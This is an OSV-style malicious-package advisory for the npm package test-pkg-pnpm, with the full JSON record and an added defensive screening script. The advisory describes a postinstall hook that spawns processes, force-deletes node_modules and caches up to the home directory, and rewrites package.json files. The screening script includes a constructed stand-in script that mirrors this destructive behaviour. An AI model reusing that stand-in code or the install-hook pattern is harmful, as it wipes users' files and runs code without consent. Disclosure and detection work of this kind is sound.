mal-2026-6716
Vulnerability from ossf_malicious_packages
Published
2026-07-01 20:47
Modified
2026-07-01 21:06
Summary
Malicious code in test-pkg-pnpm (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ae5df84cbdf3092d5f7b8f405248144eacdf5119c756c97726974e547810ebec)

On npm install, the package's postinstall script (node demo-clean.js) auto-executes two installer-side actions without consent.

First, openDemo() platform-branches via execSync to open https://github.com/X3r0Day/BunnyHijack in the installer's default browser and to spawn the OS calculator (calc on Windows, open -a Calculator on macOS, gnome-calculator/kcalc on Linux), the canonical calc.exe proof of arbitrary code execution on the installer's host.

Second, cleanup() walks every ancestor directory of INIT_CWD, process.cwd(), and the user's home directory, calling fs.rmSync(..., {recursive:true, force:true}) against paths inside each ancestor's node_modules, node_modules/.pnpm, node_modules/.bin/node* shims, ~/.npm/_npx, ~/.bun/install/cache, and tmpdir entries; cleanupPackageJson() then reads each ancestor package.json and rewrites it via fs.writeFileSync after deleting matching entries from dependencies, devDependencies, optionalDependencies, and peerDependencies.

The destructive recursive-force-rm operates well outside the package's own directory and reaches the user's home tree, and the spawned-process primitive can be retargeted to any binary in a future release.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
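The lifecycle-script behaviour described in the details above (a postinstall hook that runs a local Node script which spawns processes, force-deletes recursively outside the package directory and rewrites ancestor package.json files) can be screened for before anything is executed. The following is an added example written for this page; it is not code from the advisory, from Amazon Inspector or from the test-pkg-pnpm package. The sample package.json and the script body are constructed stand-ins that mirror the described behaviours, the URL example.invalid is a placeholder, and the indicator names, regexes and verdict thresholds are this example's own assumptions rather than a published rule set.

```javascript
// Added example, not code from the advisory, from Amazon Inspector or from
// the test-pkg-pnpm package. A pre-install screen for the lifecycle-script
// behaviours described in the advisory. Node.js built-ins only; it touches
// no files and makes no network calls.

// Hooks that npm runs automatically when a dependency is installed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators derived from the behaviours the advisory describes. The ids and
// regexes are this example's own choices (assumption), not a published rule set.
const INDICATORS = [
  { id: "shell-exec", why: "spawns a child process during install",
    re: /\b(execSync|execFileSync|spawnSync|spawn|exec)\s*\(/ },
  { id: "open-url", why: "opens a URL in the installer's default browser",
    re: /\b(open|xdg-open|start)\s+["']?https?:\/\// },
  { id: "rm-recursive-force", why: "recursive, forced deletion",
    re: /rmSync\s*\([\s\S]{0,200}?recursive\s*:\s*true[\s\S]{0,100}?force\s*:\s*true/ },
  { id: "escape-package-dir", why: "resolves paths outside the package directory",
    re: /\b(INIT_CWD|homedir\s*\(\)|tmpdir\s*\(\))/ },
  { id: "rewrite-package-json", why: "rewrites a package.json it does not own",
    re: /writeFileSync\s*\([^)]*package\.json/ },
];

// Indicators that should stop an unattended install outright.
const BLOCKING = new Set(["shell-exec", "rm-recursive-force", "escape-package-dir", "rewrite-package-json"]);

// Return the lifecycle hooks a parsed package.json declares, in run order.
function lifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// "node demo-clean.js" -> "demo-clean.js"; null when the hook is not a plain
// local Node script (e.g. "node-gyp rebuild"), which still needs a human look.
function scriptFileOf(command) {
  const m = command.match(/^\s*node\s+(\S+\.[cm]?js)\b/);
  return m ? m[1] : null;
}

// pkg: parsed package.json; files: { relativePath: sourceText } read from the
// tarball. Returns one finding per lifecycle hook.
function auditPackage(pkg, files) {
  return lifecycleScripts(pkg).map(({ hook, command }) => {
    const file = scriptFileOf(command);
    const source = file ? files[file] : undefined;
    if (typeof source !== "string") {
      return { hook, command, file, indicators: [], note: "hook is not a local script in the tarball; inspect manually" };
    }
    const indicators = INDICATORS.filter((i) => i.re.test(source)).map((i) => i.id);
    return { hook, command, file, indicators };
  });
}

// "ok": no lifecycle hooks at all; "review": hooks present but nothing blocking
// matched (obfuscated scripts evade regexes, so a human still reads them);
// "block": at least one blocking indicator matched.
function verdict(findings) {
  if (findings.some((f) => f.indicators.some((i) => BLOCKING.has(i)))) return "block";
  return findings.length ? "review" : "ok";
}

// Constructed sample mirroring the advisory's description. The script body is
// a stand-in written for this example and is never executed here; it is not
// the real demo-clean.js, and example.invalid is a placeholder URL.
const SAMPLE_PKG = { name: "sample-pkg", version: "0.0.0", scripts: { postinstall: "node demo-clean.js" } };
const SAMPLE_FILES = {
  "demo-clean.js": `
const { execSync } = require("node:child_process");
const fs = require("node:fs");
const os = require("node:os");
const path = require("node:path");
function openDemo() {
  if (process.platform === "win32") execSync("start https://example.invalid/demo && calc");
  else if (process.platform === "darwin") execSync("open https://example.invalid/demo");
  else execSync("xdg-open https://example.invalid/demo");
}
function cleanup() {
  for (const start of [process.env.INIT_CWD, process.cwd(), os.homedir()]) {
    for (let dir = start; dir; dir = path.dirname(dir) === dir ? "" : path.dirname(dir)) {
      fs.rmSync(path.join(dir, "node_modules", ".pnpm"), { recursive: true, force: true });
      fs.writeFileSync(path.join(dir, "package.json"), "{}");
    }
  }
}
`,
};

const findings = auditPackage(SAMPLE_PKG, SAMPLE_FILES);
console.log(JSON.stringify(findings, null, 2));
console.log("verdict:", verdict(findings)); // block
```

In practice the files map comes from the tarball fetched with npm pack name@version (which downloads without running the dependency's own lifecycle scripts) or from the URL in npm view name@version dist.tarball. A block verdict is a reason to install with --ignore-scripts (or ignore-scripts=true in .npmrc) and read the script by hand; a review verdict means a hook exists that the regexes did not flag, which covers the obfuscated or indirect cases this screen cannot see, so it is deliberately not treated as clean.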
Credits

  • Amazon Inspector (FINDER), inspector-research@amazon.com

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "package.json",
              "sha256": "8f7a41070899d5ceb3cd3a6efd35364f45943b1b41a0f8a01010993f897e48d1",
              "tlsh": "1ed02b448861467324cd38615d399403a7380b4780153c2c62d71099aa497bb04b9265"
            },
            {
              "path": "shim.js",
              "sha256": "e4ae6c862f2fcf3c6440c966cd74bd9f07a06be072bd301df27ae0848aa50adb",
              "tlsh": "3331726796a197f42de04dc2a487482174abc723b205ffb881ced1536b8a41702fb4f9"
            }
          ],
          "package_integrity": [
            {
              "filename": "test-pkg-pnpm-1.0.1.tgz",
              "hashes": {
                "sha1": "b399121b46ab19bca631a7c8234653a187e9a343",
                "sha512_sri": "sha512-Jki+8yoVYBSIpTuE83uAVs1P1+sB7zGchYs0/a6Ehyc2FFIBXxtxeRKEMgN/paXXit0sHpH3rMCizPaOluUlgw=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "test-pkg-pnpm"
      },
      "versions": [
        "1.0.1",
        "1.0.4"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-007894",
        "import_time": "2026-07-01T21:04:20.562853387Z",
        "modified_time": "2026-07-01T20:47:27Z",
        "sha256": "8ee6a2ba8d90a67199eae146b7688190adb974ce5aa1be7c07d56e2e3999d270",
        "source": "amazon-inspector",
        "versions": [
          "1.0.1"
        ]
      },
      {
        "id": "IN-MAL-2026-007893",
        "import_time": "2026-07-01T21:04:20.500515222Z",
        "modified_time": "2026-07-01T20:47:19Z",
        "sha256": "ae5df84cbdf3092d5f7b8f405248144eacdf5119c756c97726974e547810ebec",
        "source": "amazon-inspector",
        "versions": [
          "1.0.4"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ae5df84cbdf3092d5f7b8f405248144eacdf5119c756c97726974e547810ebec)\nOn `npm install`, the package\u0027s `postinstall` script (`node demo-clean.js`) auto-executes two installer-side actions without consent. First, `openDemo()` platform-branches via `execSync` to open https://github.com/X3r0Day/BunnyHijack in the installer\u0027s default browser and to spawn the OS calculator (`calc` on Windows, `open -a Calculator` on macOS, `gnome-calculator`/`kcalc` on Linux) \u2014 the canonical `calc.exe` proof of unauthenticated code execution on the installer\u0027s host. Second, `cleanup()` walks every ancestor directory of `INIT_CWD`, `process.cwd()`, and the user\u0027s home directory, calling `fs.rmSync(..., {recursive:true, force:true})` against paths inside each ancestor\u0027s `node_modules`, `node_modules/.pnpm`, `node_modules/.bin/node*` shims, `~/.npm/_npx`, `~/.bun/install/cache`, and tmpdir entries; `cleanupPackageJson()` then reads each ancestor `package.json` and rewrites it via `fs.writeFileSync` after deleting matching entries from `dependencies`, `devDependencies`, `optionalDependencies`, and `peerDependencies`. The destructive recursive-force-rm operates well outside the package\u0027s own directory and reaches the user\u0027s home tree, and the spawned-process primitive can be retargeted to any binary in a future release.\n",
  "id": "MAL-2026-6716",
  "modified": "2026-07-01T21:06:12Z",
  "published": "2026-07-01T20:47:19Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/test-pkg-pnpm/v/1.0.1"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/test-pkg-pnpm/v/1.0.4"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in test-pkg-pnpm (npm)"
}